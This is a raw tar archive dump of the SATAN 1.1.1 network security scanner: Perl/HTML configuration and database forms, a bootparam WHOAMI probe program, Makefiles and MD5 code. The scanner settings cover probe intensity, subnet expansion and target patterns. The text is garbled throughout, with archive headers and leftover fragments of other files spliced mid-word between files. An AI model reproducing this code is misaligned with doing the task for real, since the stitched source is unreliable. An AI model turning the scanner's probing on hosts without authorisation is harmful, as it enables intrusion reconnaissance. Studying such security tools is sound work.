and data against password disclosure. With version 1.1 and later, SATAN even attempts to protect you <i>after</i> the password has fallen into the hands of unauthorized users: <ul> <li> SATAN displays a warning and advises the user to not contact other HTML servers from within a SATAN session, when it finds that the HTML client program reveals SATAN password information as part of parent URL information. <p> <li>SATAN rejects requests that appear to come from hosts other than the one it is running on, that refer to resources outside its own HTML tree, or that contain unexpected data. <p> <li>SATAN terminates with a warning when it finds a valid SATAN password in an illegal request: SATAN assumes the password has fallen into the hands of unauthorized users and assumes the worst. </ul> </BODY> </HTML> thorized, by handing over the correct magic cookie. This requirement prevents unauthorized access, provided thatsatan-1.1.1/html/admin/............................................................................. 700 . 465 . 506 . 0 5742521547 7651. .............................................. ................................................................................................................................................................................................................................................................. .....................................................satan-1.1.1/html/admin/satan_cf_action.pl........................................................... 600 . 465 . 506 . 1531 5737240517 13407. ................................................ ................................................................................................................................................................................................................................................................. ...................................................# # Collect data and keep the user informed. # require "perl/config.pl"; # # Make sure they specified a data file if ($satan_data eq "") { .print CLIENT <<EOF; <HTML> <HEAD> <TITLE>Error - Missing input (no SATAN data file found)</TITLE> <LINK REV="made" HREF="mailto:satan\@fish.com"> </HEAD> <BODY> <H1><IMG SRC=$HTML_ROOT/images/satan.gif> Error - Missing input </H1> <hr> No data directory was specified. </BODY> </HTML> EOF .die "\n"; .} # # Write the data... &write_config_file($html_post_attributes); print CLIENT <<EOF; <HTML> <HEAD> <TITLE>SATAN Configuration Management</TITLE> <LINK REV="made" HREF="mailto:satan\@fish.com"> </HEAD> <BODY> <H1><IMG SRC=$HTML_ROOT/images/satan.gif> SATAN Configuration Management </H1> <hr> <B>Configuration file changed</B> <hr> <a href=$HTML_STARTPAGE> Back to the SATAN start page </a> </BODY> </HTML> EOF sword <i>everytime</i> you start it up under an HTML client, so if you are suspicious, simply restart the program. <p> SATAN never sends its current password over thsatan-1.1.1/html/admin/satan_cf_form.pl............................................................. 600 . 465 . 506 . 12243 5741745515 13122. ....................................................... ................................................................................................................................................................................................................................................................. ............................................# # Display a FORM to select default config options to give the user # control over the knobs and dials # # First figure out what radio buttons etc. should be "on". Note: the # variables below are global. Perhaps we should hide in our own package # name space. # @cf_attack_level = ();.$cf_attack_level[$attack_level] = "checked"; @cf_timeout = ();.$cf_timeout[$timeout] = "checked"; @cf_sub_zero = ();.$cf_sub_zero[$sub_zero_proximity] = "checked"; @cf_attack_proximate = (); .$cf_attack_proximate[$attack_proximate_subnets] = "checked"; @cf_dont_nslookup = ();.$cf_dont_nslookup[$dont_use_nslookup] = "checked"; @cf_dont_ping = ();.$cf_dont_ping[$dont_use_ping] = "checked"; @cf_untrusted = ();.$cf_untrusted[$untrusted_host] = "checked"; print CLIENT <<EOF <HTML> <HEAD> <TITLE>SATAN Configuration Management</TITLE> <LINK REV="made" HREF="mailto:satan\@fish.com"> </HEAD> <BODY> <IMG SRC=$HTML_ROOT/images/satan.gif> <H1>SATAN Configuration Management</H1> <HR> <FORM METHOD=POST ACTION=satan_cf_action.pl> <H2>Scanning levels and timeouts</H2> <STRONG>What directory should I store the data in?</STRONG> <DL compact> <DT><DD><INPUT SIZE=25 NAME=satan_data VALUE=$satan_data> Satan data directory </DL> <P> <STRONG>What probe level should I use?</STRONG> <DL compact> <DT><DD><INPUT TYPE="radio" NAME=attack_level VALUE=0 $cf_attack_level[0]> Light <DT><DD><INPUT TYPE="radio" NAME=attack_level VALUE=1 $cf_attack_level[1]> Normal <DT><DD><INPUT TYPE="radio" NAME=attack_level VALUE=2 $cf_attack_level[2]> Heavy </DL> <P> <STRONG>What timeout values should I use?</STRONG> <DL compact> <DT><DD><INPUT SIZE=3 NAME=long_timeout VALUE=$long_timeout> Slow <DT><DD><INPUT SIZE=3 NAME=med_timeout VALUE=$med_timeout> Medium <DT><DD><INPUT SIZE=3 NAME=short_timeout VALUE=$short_timeout> Fast </DL> <P> <STRONG>What signal should I send to kill a tool process when it times out?</STRONG> <DL compact> <DT><DD><INPUT SIZE=3 NAME=timeout_kill VALUE=$timeout_kill>Kill signal </DL> <P> <STRONG>How far out from the original target should I probe?</STRONG> (Under no circumstances should this be higher than "2" unless you're POSITIVE you know what you're doing!) <DL compact> <DT><DD><INPUT SIZE=3 NAME=max_proximity_level VALUE=$max_proximity_level> Maximal proximity </DL> <P> <STRONG>As I move out to less proximate hosts, how much should I drop the probe level?</STRONG> <DL compact> <DT><DD><INPUT SIZE=3 NAME=proximity_descent VALUE=$proximity_descent> Proximity descent </DL> <P> <STRONG>When I go below 0 probe level, should I:</STRONG> <DL compact> <DT><DD><INPUT TYPE="radio" NAME=sub_zero_proximity VALUE=0 $cf_sub_zero[0]>Stop <DT><DD><INPUT TYPE="radio" NAME=sub_zero_proximity VALUE=1 $cf_sub_zero[1]>Go on </DL> <P> <STRONG>Should I do subnet expansion; that is, should I probe just the target or its entire subnet?</STRONG> <DL compact> <DT><DD><INPUT TYPE="radio" NAME=attack_proximate_subnets VALUE=0 .$cf_attack_proximate[0]>Just the target <DT><DD><INPUT TYPE="radio" NAME=attack_proximate_subnets VALUE=1 .$cf_attack_proximate[1]>The entire subnet </DL> <P> <STRONG>Does $THIS_HOST appear in <i>rhosts, hosts.equiv</i> or <i>NFS exports</i> files of hosts being probed? </STRONG> <DL compact> <DT><DD><INPUT TYPE="radio" NAME=untrusted_host VALUE=0 $cf_untrusted[0]> You are running SATAN from a possibly trusted host <DT><DD><INPUT TYPE="radio" NAME=untrusted_host VALUE=1 $cf_untrusted[1]> You are running SATAN from an untrusted host </DL> <HR> <h2>Patterns specifying hosts to limit the probe to</h2> If you only want to probe hosts within a specific domain, you could use, for example: <PRE> .podunk.edu </PRE> <p> If you only want to probe sites on a particular subnet, you could use, for example: <PRE> .192.9.9 </PRE> <p> <INPUT SIZE=48 NAME=only_attack_these VALUE="$only_attack_these"> <p> You can specify multiple shell-like patterns, separated by whitespace or commas, and you may mix networks and domains. A host will be scanned when it matches <i>any</i> pattern: either a network number prefix or an internet domain suffix. <hr> <h2>Patterns specifying hosts to NOT probe</h2> If you don't want to probe any military or governmental sites, you could use: <PRE> .mil, gov </PRE> <p> <INPUT SIZE=48 NAME=dont_attack_these VALUE="$dont_attack_these"> <p> You can specify multiple shell-like patterns, separated by whitespace or commas, and you may mix networks and domains. A host will be skipped when it matches <i>any</i> pattern: either a network number prefix or an internet domain suffix. <hr> <H2>Workarounds for broken DNS, ICMP etc.</H2> <DL compact> <DT><DD><INPUT TYPE="radio" NAME="dont_use_nslookup" VALUE="0" $cf_dont_nslookup[0]> Use <i>nslookup</i> to look up fully-qualified (<i>host.domain</i>) host names <DT><DD><INPUT TYPE="radio" NAME="dont_use_nslookup" VALUE="1" $cf_dont_nslookup[1]> Don't use <i>nslookup</i>: DNS is unavailable. </DL> <DL compact> <DT><DD><INPUT TYPE="radio" NAME="dont_use_ping" VALUE="0" $cf_dont_ping[0]> Ping hosts to see if they are alive (skip non-responding hosts). <DT><DD><INPUT TYPE="radio" NAME="dont_use_ping" VALUE="1" $cf_dont_ping[1]> Don't ping hosts: ICMP does not work. </DL> <HR> <INPUT TYPE="submit" VALUE="Change the configuration file"> </FORM> </BODY> </HTML> EOF atan data directory </DL> <P> <STRONG>What probe level should I use?</STRONG> <DL compact> <DT><DD><INPUT TYPE="radio" NAME=attack_level VALUE=0 $cf_attack_level[0]> Light <DT><DD><INPUT TYPE="radio" NAME=attack_level VALUE=1 $cf_attack_level[1]> Normal <DT><DD><INPUT TYPE="radio" NAME=attack_level VALUE=2 $cf_attack_level[2]> Heavy </DL> <P> <Ssatan-1.1.1/html/satan_documentation.pl............................................................. 600 . 465 . 506 . 2320 5737557702 13247. ................................................................................................... ................................................................................................................................................................................................................................................................. print <<EOF <HTML> <HEAD> <title>SATAN</title> <LINK REV="made" HREF="mailto:satan\@fish.com"> </HEAD> <BODY> <H1><IMG SRC="images/satan.gif"> SATAN Documentation</H1> <H2>(Security Administrator Tool for Analyzing Networks)</H2> <HR> <UL> <dt><IMG SRC="dots/blackdot.gif" ALT="*"> .<A HREF="docs/satan_overview.html"><strong>SATAN Overview - Introduction, Concepts and Acknowledgements </strong></A> <p> <dt><IMG SRC="dots/blackdot.gif" ALT="*"> .<A HREF="tutorials/first_time/learning_to_use.html"><strong> Learning to use SATAN - a Quick Tutorial</strong></A> <p> <dt><IMG SRC="dots/blackdot.gif" ALT="*"> .<A HREF="$HTML_SERVER/tutorials/vulnerability_tutorials.pl"><strong> Vulnerabilities - a Tutorial</strong></A> <p> <dt><IMG SRC="dots/blackdot.gif" ALT="*"> .<A HREF="docs/satan_reference.html"><strong>SATAN Reference - Architecture, Configuration and Operation</strong></A> <p> <dt><IMG SRC="dots/blackdot.gif" ALT="*"> .<A HREF="docs/FAQ.html"><strong> Frequently Asked Questions (SATAN FAQ)</strong></A> <p> <dt><IMG SRC="dots/blackdot.gif" ALT="*"> .<A HREF="docs/quotes.html"><strong> Quotable quotes about SATAN</strong></A> </UL> <hr> <a href=$HTML_STARTPAGE> Back to the SATAN start page </a> </BODY> </HTML> EOF aximal proximity </DL> <P> <STRONG>As I move out to less proximate hosts, how much should I drop the probe level?</STRONG> <DL compact> <DT><DD><INPUT SIZE=3 NAME=proximity_descent VALUE=$proximity_descent> Proximity descent </DL> <P> <STRONG>When I go below 0 probe level, should I:</STRONG> <DL compasatan-1.1.1/html/data/.............................................................................. 700 . 465 . 506 . 0 5742521547 7472. ............................................................................................ ................................................................................................................................................................................................................................................................. .......satan-1.1.1/html/data/satan_data_form.pl............................................................ 600 . 465 . 506 . 3103 5737240564 13236. .............................................................................................. ................................................................................................................................................................................................................................................................. .....# # Select SATAN data base # $_satan_dir = ""; @_results = `ls results`; for (@_results) { chop; } print CLIENT <<EOF; <HTML> <HEAD> <title> SATAN Data Management </title> <LINK REV="made" HREF="mailto:satan\@fish.com"> </HEAD> <BODY> <H1><IMG SRC=$HTML_ROOT/images/satan.gif> SATAN Data Management </H1> <hr> <ul> <p><li><a href="#open">Open or create SATAN database</a> <p><li><a href="#merge">Merge existing SATAN database</a> </ul> <hr> <FORM METHOD=POST ACTION="satan_open_action.pl"> <a name="open-or-create"><h3>Open existing or create new SATAN data base</h3> <h3> <INPUT TYPE="reset" VALUE=" Reset "> <INPUT SIZE="28" NAME="_satan_dir" Value="$satan_data"> <INPUT TYPE="submit" VALUE=" Open or create "> </h3> </FORM> EOF if (@_results) { .print CLIENT <<EOF; .<h3>Existing data bases...</h3> EOF } print CLIENT <<EOF; <ul> EOF for (@_results) { .if (-d "results/$_") { ..print CLIENT <<EOF; ..<li> <a href="satan_open_action.pl,$_,">$_</a> EOF .} } print CLIENT <<EOF; </ul> <hr> <FORM METHOD=POST ACTION="satan_merge_action.pl"> <a name="merge"><h3>Merge with existing SATAN data base</h3> <h3> <INPUT TYPE="reset" VALUE=" Reset "> <INPUT SIZE="28" NAME="_satan_dir" Value=""> <INPUT TYPE="submit" VALUE=" Merge "> </h3> </FORM> EOF if (@_results) { .print CLIENT <<EOF; .<h3>Existing data bases...</h3> EOF } print CLIENT <<EOF; <ul> EOF for (@_results) { .if (-d "results/$_") { ..print CLIENT <<EOF; ..<li> <a href="satan_merge_action.pl,$_,">$_</a> EOF .} } print CLIENT <<EOF; </ul> <hr> <a href=$HTML_STARTPAGE> Back to the SATAN start page </a> </BODY> </HTML> EOF ><strong> Quotable quotes about SATAN</strong></A> </UL> <hr> <a href=$HTML_STARTPAGE> Back to the SATAN start page </a> </BODY> </HTML> EOF aximal proximity </DL> <P> <STRONG>As I move out to less proximate hosts, how much should I drop the probe level?</STRONG> <DL compact> <DT><DD><INPUT SIZE=3 NAME=proximity_descent VALUE=$proximity_descent> Proximity descent </DL> <P> <STRONG>When I go below 0 probe level, should I:</STRONG> <DL compasatan-1.1.1/html/data/satan_merge_action.pl......................................................... 600 . 465 . 506 . 2365 5737240573 13747. ............................................................................................ ................................................................................................................................................................................................................................................................. .......# # Open a data base and keep the user informed. # ($_directory) = split(/,/, $html_script_args); # # Make sure they specified a directory at all. # $_directory = $_satan_dir if $_directory eq ""; if ($_directory eq "") { .print CLIENT <<EOF; <HTML> <HEAD> <TITLE>Error - Missing input </TITLE> <LINK REV="made" HREF="mailto:satan\@fish.com"> </HEAD> <BODY> <H1><IMG SRC=$HTML_ROOT/images/satan.gif> Error - Missing input </H1> <hr> No data base name was specified. </BODY> </HTML> EOF .die "\n"; } # # Create data base when it does not exist # $satan_data = $_directory; &find_satan_data(); # # Read the data base, after resetting the in-core data structures. # print CLIENT <<EOF; <HTML> <HEAD> <TITLE>SATAN Data Management</TITLE> <LINK REV="made" HREF="mailto:satan\@fish.com"> </HEAD> <BODY> <H1><IMG SRC=$HTML_ROOT/images/satan.gif> SATAN Data Management</H1> <HR> EOF if (-s "$facts_file") { .print CLIENT <<EOF; <strong>merging data from <i> $_directory. </i> This may take some time. <p> EOF } &merge_satan_data(); print CLIENT <<EOF; <strong>Data base selection completed successfully.</strong> <hr> <a href=$HTML_STARTPAGE> Back to the SATAN start page </a> | <a href=../reporting/analysis.pl>Continue with report and analysis</a> </BODY> </HTML> EOF s I move out to less proximate hosts, how much should I drop the probe level?</STRONG> <DL compact> <DT><DD><INPUT SIZE=3 NAME=proximity_descent VALUE=$proximity_descent> Proximity descent </DL> <P> <STRONG>When I go below 0 probe level, should I:</STRONG> <DL compasatan-1.1.1/html/data/satan_open_action.pl.......................................................... 600 . 465 . 506 . 2364 5737240604 13603. ............................................................................................ ................................................................................................................................................................................................................................................................. .......# # Open a data base and keep the user informed. # ($_directory) = split(/,/, $html_script_args); # # Make sure they specified a directory at all. # $_directory = $_satan_dir if $_directory eq ""; if ($_directory eq "") { .print CLIENT <<EOF; <HTML> <HEAD> <TITLE>Error - Missing input </TITLE> <LINK REV="made" HREF="mailto:satan\@fish.com"> </HEAD> <BODY> <H1><IMG SRC=$HTML_ROOT/images/satan.gif> Error - Missing input </H1> <hr> No data base name was specified. </BODY> </HTML> EOF .die "\n"; } # # Create data base when it does not exist # $satan_data = $_directory; &init_satan_data(); # # Read the data base, after resetting the in-core data structures. # print CLIENT <<EOF; <HTML> <HEAD> <TITLE>SATAN Data Management</TITLE> <LINK REV="made" HREF="mailto:satan\@fish.com"> </HEAD> <BODY> <H1><IMG SRC=$HTML_ROOT/images/satan.gif> SATAN Data Management</H1> <HR> EOF if (-s "$facts_file") { .print CLIENT <<EOF; <strong>Loading data from <i> $_directory. </i> This may take some time. <p> EOF } &read_satan_data(); print CLIENT <<EOF; <strong>Data base selection completed successfully.</strong> <hr> <a href=$HTML_STARTPAGE> Back to the SATAN start page </a> | <a href=../reporting/analysis.pl>Continue with report and analysis</a> </BODY> </HTML> EOF s I move out to less proximate hosts, how much should I drop the probe level?</STRONG> <DL compact> <DT><DD><INPUT SIZE=3 NAME=proximity_descent VALUE=$proximity_descent> Proximity descent </DL> <P> <STRONG>When I go below 0 probe level, should I:</STRONG> <DL compasatan-1.1.1/src/.................................................................................... 700 . 465 . 506 . 0 5742521557 6405. ............................................................................................ ................................................................................................................................................................................................................................................................. .......satan-1.1.1/src/boot/............................................................................... 700 . 465 . 506 . 0 5742521550 7341. .............................................................................................. ................................................................................................................................................................................................................................................................. .....satan-1.1.1/src/boot/Makefile....................................................................... 600 . 465 . 506 . 627 5741522770 11061. ................................................................................................ ................................................................................................................................................................................................................................................................. ...SHELL.= /bin/sh BIN.= ../../bin OBJECTS.= boot.o bootparam_prot_xdr.o CFLAGS.= -I. -O $(XFLAGS) XFLAGS.= -DAUTH_GID_T=int RPCGEN.= rpcgen #LIBS.= -lsocket -lnsl $(BIN)/boot: $(OBJECTS) .$(CC) $(CFLAGS) -o $@ $(OBJECTS) $(LIBS) bootparam_prot.h bootparam_prot_xdr.c: bootparam_prot.x .$(RPCGEN) bootparam_prot.x 2>/dev/null $(OBJECTS): bootparam_prot.h clean: .rm -f *.o $(BIN)/boot bootparam_prot*.[hc] - Missing input </H1> <hr> No data base name was specified. </BODY> </HTML> EOF .die "\n"; } # # Createsatan-1.1.1/src/boot/boot.c......................................................................... 600 . 465 . 506 . 4607 5727101305 10541. ............................................................................................. ................................................................................................................................................................................................................................................................. ...... /* * Usage: boot bootclient bootserver * * Executes a bootparam WHOAMI request and print the results. */ #include <stdio.h> #include <sys/types.h> #include <sys/socket.h> #include <netdb.h> #include <rpc/rpc.h> #include "bootparam_prot.h" main(argc, argv) int argc; char *argv[]; { int stat; char host[256]; struct hostent *hp; static struct bp_whoami_arg bp_arg; static struct bp_whoami_res bp_res; char *domain; char *strchr(); char *clnt_sperrno(); char *me = argv[0]; char *client = argv[1]; char *server = argv[2]; long addr; if (argc != 3) { .fprintf(stderr, "Usage: %s bootclient bootserver\n", me); .exit(1); } /* Find out the bootserver's official host name. */ if ((hp = gethostbyname(server)) == NULL) { .fprintf(stderr, "Host %s not found.\n", server); .exit(1); } /* If bootclient name isn't in FQDN form, append domain from server. */ if (strchr(client, '.') == 0 && (domain = strchr(hp->h_name, '.')) != 0) { .sprintf(host, "%s%s", client, domain); .client = host; } /* Find out the bootclient's address. Assume it has only one. */ if ((hp = gethostbyname(client)) != NULL) { .memcpy((caddr_t) & bp_arg.client_address.bp_address_u.ip_addr, . hp->h_addr_list[0], hp->h_length); } else if ((addr = inet_addr(client)) != -1) { .memcpy((caddr_t) & bp_arg.client_address.bp_address_u.ip_addr, . &addr, sizeof(addr)); } else { .fprintf(stderr, "Host %s not found.\n", client); .return (1); } bp_arg.client_address.address_type = IP_ADDR_TYPE; bp_res.client_name = 0;.../* allocate buffer */ bp_res.domain_name = 0;.../* allocate buffer */ if (stat = callrpc(server, .. BOOTPARAMPROG, BOOTPARAMVERS, .. BOOTPARAMPROC_WHOAMI, .. xdr_bp_whoami_arg, &bp_arg, .. xdr_bp_whoami_res, &bp_res)) { .fprintf(stderr, .."me: cannot contact bootparam server at %s for %s: %s\n", ..server, client, clnt_sperrno(stat)); .return (1); } printf("client_name: %s\n", bp_res.client_name); printf("domain_name: %s\n", bp_res.domain_name); printf("router_addr: %d.%d.%d.%d\n", . (bp_res.router_address.bp_address_u.ip_addr.net & 0377), . (bp_res.router_address.bp_address_u.ip_addr.host & 0377), . (bp_res.router_address.bp_address_u.ip_addr.lh & 0377), . (bp_res.router_address.bp_address_u.ip_addr.impno & 0377)); return (0); } ost </DL> <HR> <h2>Patterns specifying hosts to limit the probe to</h2> If you only want to probe hosts within a specisatan-1.1.1/src/boot/bootparam_prot.x............................................................... 600 . 465 . 506 . 5713 5727104345 12661. ....................................................... ................................................................................................................................................................................................................................................................. ............................................/* * Sun RPC is a product of Sun Microsystems, Inc. and is provided for * unrestricted use provided that this legend is included on all tape * media and as a part of the software program in whole or part. Users * may copy or modify Sun RPC without charge, but are not authorized * to license or distribute it to anyone else except as part of a product or * program developed by the user. * * SUN RPC IS PROVIDED AS IS WITH NO WARRANTIES OF ANY KIND INCLUDING THE * WARRANTIES OF DESIGN, MERCHANTIBILITY AND FITNESS FOR A PARTICULAR * PURPOSE, OR ARISING FROM A COURSE OF DEALING, USAGE OR TRADE PRACTICE. * * Sun RPC is provided with no support and without any obligation on the * part of Sun Microsystems, Inc. to assist in its use, correction, * modification or enhancement. * * SUN MICROSYSTEMS, INC. SHALL HAVE NO LIABILITY WITH RESPECT TO THE * INFRINGEMENT OF COPYRIGHTS, TRADE SECRETS OR ANY PATENTS BY SUN RPC * OR ANY PART THEREOF. * * In no event will Sun Microsystems, Inc. be liable for any lost revenue * or profits or other special, indirect and consequential damages, even if * Sun has been advised of the possibility of such damages. * * Sun Microsystems, Inc. * 2550 Garcia Avenue * Mountain View, California 94043 */ /* * RPC for bootparms service. * There are two procedures: * WHOAMI takes a net address and returns a client name and also a *.likely net address for routing * GETFILE takes a client name and file identifier and returns the *.server name, server net address and pathname for the file. * file identifiers typically include root, swap, pub and dump */ #ifdef RPC_HDR %#include <rpc/types.h> %#include <sys/time.h> %#include <sys/errno.h> %/*#include <nfs/nfs.h>*/ #else %#ifndef lint %/*static char sccsid[] = "from: @(#)bootparam_prot.x 1.2 87/06/24 Copyr 1987 Sun Micro";*/ %/*static char sccsid[] = "from: @(#)bootparam_prot.x.2.1 88/08/01 4.0 RPCSRC";*/ %static char rcsid[] = "$Id: bootparam_prot.x,v 1.1 1994/08/04 19:01:44 wollman Exp $"; %#endif /* not lint */ #endif const MAX_MACHINE_NAME = 255; const MAX_PATH_LEN.= 1024; const MAX_FILEID.= 32; const IP_ADDR_TYPE.= 1; typedef.string.bp_machine_name_t<MAX_MACHINE_NAME>; typedef.string.bp_path_t<MAX_PATH_LEN>; typedef.string.bp_fileid_t<MAX_FILEID>; struct.ip_addr_t { .char.net; .char.host; .char.lh; .char.impno; }; union bp_address switch (int address_type) { .case IP_ADDR_TYPE: ..ip_addr_t.ip_addr; }; struct bp_whoami_arg { .bp_address..client_address; }; struct bp_whoami_res { .bp_machine_name_t.client_name; .bp_machine_name_t.domain_name; .bp_address..router_address; }; struct bp_getfile_arg { .bp_machine_name_t.client_name; .bp_fileid_t..file_id; }; . struct bp_getfile_res { .bp_machine_name_t.server_name; .bp_address..server_address; .bp_path_t..server_path; }; program BOOTPARAMPROG { .version BOOTPARAMVERS { ..bp_whoami_res.BOOTPARAMPROC_WHOAMI(bp_whoami_arg) = 1; ..bp_getfile_res.BOOTPARAMPROC_GETFILE(bp_getfile_arg) = 2; .} = 1; } = 100026; rrno(stat)); .return (1); } printf("client_nasatan-1.1.1/src/misc/............................................................................... 700 . 465 . 506 . 0 5742521552 7333. ................................................................................ ................................................................................................................................................................................................................................................................. ...................satan-1.1.1/src/misc/Makefile....................................................................... 600 . 465 . 506 . 1355 5741563641 11072. .................................................................................. ................................................................................................................................................................................................................................................................. .................SHELL.= /bin/sh BIN.= ../../bin PROGS.= $(BIN)/md5 $(BIN)/sys_socket $(BIN)/timeout $(BIN)/rcmd \ .$(BIN)/safe_finger $(BIN)/rex CFLAGS.= -O -I. $(XFLAGS) XFLAGS.= -DAUTH_GID_T=int RPCGEN.= rpcgen #LIBS.= -lsocket -lnsl all:.$(PROGS) $(BIN)/timeout: timeout.c .$(CC) $(CFLAGS) -o $@ $? $(BIN)/rex: rex.o rex_xdr.o .$(CC) $(CFLAGS) -o $@ rex.o rex_xdr.o $(LIBS) $(BIN)/md5: md5.o md5c.o .$(CC) $(CFLAGS) -o $@ md5.o md5c.o $(BIN)/rcmd: rcmd.c .$(CC) $(CFLAGS) -o $@ $? $(LIBS) $(BIN)/sys_socket: sys_socket.c .$(CC) $(CFLAGS) -o $@ $? $(BIN)/safe_finger: safe_finger.c .$(CC) $(CFLAGS) -o $@ $? rex.h rex_xdr.c: rex.x .$(RPCGEN) rex.x 2>/dev/null rex.o rex_xdr.o: rex.h clean: .rm -f $(PROGS) *.o core rex_svc.c rex_clnt.c rex.h rex_xdr.c atic char sccsid[] = "from: @(#)bootparam_prot.x 1.2 87/06/24 Copyr 1987 Sun Micro";*/ %/*static char sccsid[] = "from: @(#)bootparam_prot.x.2.1 88/08/01 4.0 RPCSRC";*/ %static char rcsid[] = "$Id: bootparam_prot.x,v 1.1 1994/08/04 19:01:44 wollman Exp $"; %#endif /* not linsatan-1.1.1/src/misc/global.h....................................................................... 600 . 465 . 506 . 1505 5720110070 11015. ................................................................................... ................................................................................................................................................................................................................................................................. ................/* GLOBAL.H - RSAREF types and constants */ /* PROTOTYPES should be set to one if and only if the compiler supports function argument prototyping. The following makes PROTOTYPES default to 0 if it has not already been defined with C compiler flags. */ #ifndef PROTOTYPES #define PROTOTYPES 0 #endif /* POINTER defines a generic pointer type */ typedef unsigned char *POINTER; /* UINT2 defines a two byte word */ typedef unsigned short int UINT2; /* UINT4 defines a four byte word */ #ifdef __alpha typedef unsigned int UINT4; #else typedef unsigned long int UINT4; #endif /* PROTO_LIST is defined depending on how PROTOTYPES is defined above. If using PROTOTYPES, then PROTO_LIST returns the list, otherwise it returns an empty list. */ #if PROTOTYPES #define PROTO_LIST(list) list #else #define PROTO_LIST(list) () #endif /*static char sccsid[] = "from: @(#)bootparam_prot.x.2.1 88/08/01 4.0 RPCSRC";*/ %static char rcsid[] = "$Id: bootparam_prot.x,v 1.1 1994/08/04 19:01:44 wollman Exp $"; %#endif /* not linsatan-1.1.1/src/misc/md5.c.......................................................................... 600 . 465 . 506 . 2115 5740245060 10245. ................................................................................... ................................................................................................................................................................................................................................................................. ................ /* * md5 - trivial command-line driver for the MD5 hash function. * * usage: md5 [files...] * * Author: Wietse Venema. */ #include <stdio.h> #include "global.h" #include "md5.h" #define MD5_HASH_LENGTH.16 main(argc, argv) int argc; char **argv; { char *crunch(); FILE *fp; if (argc < 2) { .printf("%s\n", crunch(stdin)); } else { .while (--argc && *++argv) { . if ((fp = fopen(*argv, "r")) == 0) { ..perror(*argv); ..return (1); . } . printf("%s.%s\n", crunch(fp), *argv); . fclose(fp); .} } return (0); } char *crunch(fp) FILE *fp; { MD5_CTX md; unsigned char sum[MD5_HASH_LENGTH]; unsigned char buf[BUFSIZ]; static char result[2 * MD5_HASH_LENGTH + 1]; static char hex[] = "0123456789abcdef"; int buflen; int i; MD5Init(&md); while ((buflen = fread(buf, 1, BUFSIZ, fp)) > 0) .MD5Update(&md, buf, buflen); MD5Final(sum, &md); for (i = 0; i < MD5_HASH_LENGTH; i++) { .result[2 * i] = hex[(sum[i] >> 4) & 0xf]; .result[2 * i + 1] = hex[sum[i] & 0xf]; } return (result); } MAX_FILEID.= 32; const IP_ADDR_TYPE.= 1; typedef.string.bp_machine_name_t<MAX_MACHINE_NAME>; typedef.string.bp_path_t<MAX_PATH_LEN>; typedef.string.bp_fileid_t<MAX_FILEID>; struct.ip_addr_t { .char.net; .char.host; .char.lh; .char.impno; }; union bp_address switch (int address_type) { .case IP_ADDR_TYPE: ..ip_addr_t.ip_addr; }; struct bp_whoami_arg { .bp_address..client_address; }; struct bp_whoami_res { .bp_machine_name_t.clisatan-1.1.1/src/misc/md5.h.......................................................................... 400 . 465 . 506 . 2501 5720110070 10235. ............................................................................... ................................................................................................................................................................................................................................................................. ..................../* MD5.H - header file for MD5C.C */ /* Copyright (C) 1991-2, RSA Data Security, Inc. Created 1991. All rights reserved. License to copy and use this software is granted provided that it is identified as the "RSA Data Security, Inc. MD5 Message-Digest Algorithm" in all material mentioning or referencing this software or this function. License is also granted to make and use derivative works provided that such works are identified as "derived from the RSA Data Security, Inc. MD5 Message-Digest Algorithm" in all material mentioning or referencing the derived work. RSA Data Security, Inc. makes no representations concerning either the merchantability of this software or the suitability of this software for any particular purpose. It is provided "as is" without express or implied warranty of any kind. These notices must be retained in any copies of any part of this documentation and/or software. */ /* MD5 context. */ typedef struct { UINT4 state[4]; /* state (ABCD) */ UINT4 count[2]; /* number of bits, modulo 2^64 (lsb first) */ unsigned char buffer[64]; /* input buffer */ } MD5_CTX; void MD5Init PROTO_LIST((MD5_CTX *)); void MD5Update PROTO_LIST((MD5_CTX *, unsigned char *, unsigned int)); void MD5Final PROTO_LIST((unsigned char [16], MD5_CTX *)); union bp_address switch (int address_type) { .case IP_ADDR_TYPE: ..ip_addr_t.ip_addr; }; struct bp_whoami_arg { .bp_address..client_address; }; struct bp_whoami_res { .bp_machine_name_t.clisatan-1.1.1/src/misc/md5c.c......................................................................... 400 . 465 . 506 . 24267 5720110070 10430. ............................................................................... ................................................................................................................................................................................................................................................................. ..................../* MD5C.C - RSA Data Security, Inc., MD5 message-digest algorithm */ /* Copyright (C) 1991-2, RSA Data Security, Inc. Created 1991. All rights reserved. License to copy and use this software is granted provided that it is identified as the "RSA Data Security, Inc. MD5 Message-Digest Algorithm" in all material mentioning or referencing this software or this function. License is also granted to make and use derivative works provided that such works are identified as "derived from the RSA Data Security, Inc. MD5 Message-Digest Algorithm" in all material mentioning or referencing the derived work. RSA Data Security, Inc. makes no representations concerning either the merchantability of this software or the suitability of this software for any particular purpose. It is provided "as is" without express or implied warranty of any kind. These notices must be retained in any copies of any part of this documentation and/or software. */ #include "global.h" #include "md5.h" /* Constants for MD5Transform routine. */ #define S11 7 #define S12 12 #define S13 17 #define S14 22 #define S21 5 #define S22 9 #define S23 14 #define S24 20 #define S31 4 #define S32 11 #define S33 16 #define S34 23 #define S41 6 #define S42 10 #define S43 15 #define S44 21 static void MD5Transform PROTO_LIST ((UINT4 [4], unsigned char [64])); static void Encode PROTO_LIST ((unsigned char *, UINT4 *, unsigned int)); static void Decode PROTO_LIST ((UINT4 *, unsigned char *, unsigned int)); static void MD5_memcpy PROTO_LIST ((POINTER, POINTER, unsigned int)); static void MD5_memset PROTO_LIST ((POINTER, int, unsigned int)); static unsigned char PADDING[64] = { 0x80, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 }; /* F, G, H and I are basic MD5 functions. */ #define F(x, y, z) (((x) & (y)) | ((~x) & (z))) #define G(x, y, z) (((x) & (z)) | ((y) & (~z))) #define H(x, y, z) ((x) ^ (y) ^ (z)) #define I(x, y, z) ((y) ^ ((x) | (~z))) /* ROTATE_LEFT rotates x left n bits. */ #define ROTATE_LEFT(x, n) (((x) << (n)) | ((x) >> (32-(n)))) /* FF, GG, HH, and II transformations for rounds 1, 2, 3, and 4. Rotation is separate from addition to prevent recomputation. */ #define FF(a, b, c, d, x, s, ac) { \ (a) += F ((b), (c), (d)) + (x) + (UINT4)(ac); \ (a) = ROTATE_LEFT ((a), (s)); \ (a) += (b); \ } #define GG(a, b, c, d, x, s, ac) { \ (a) += G ((b), (c), 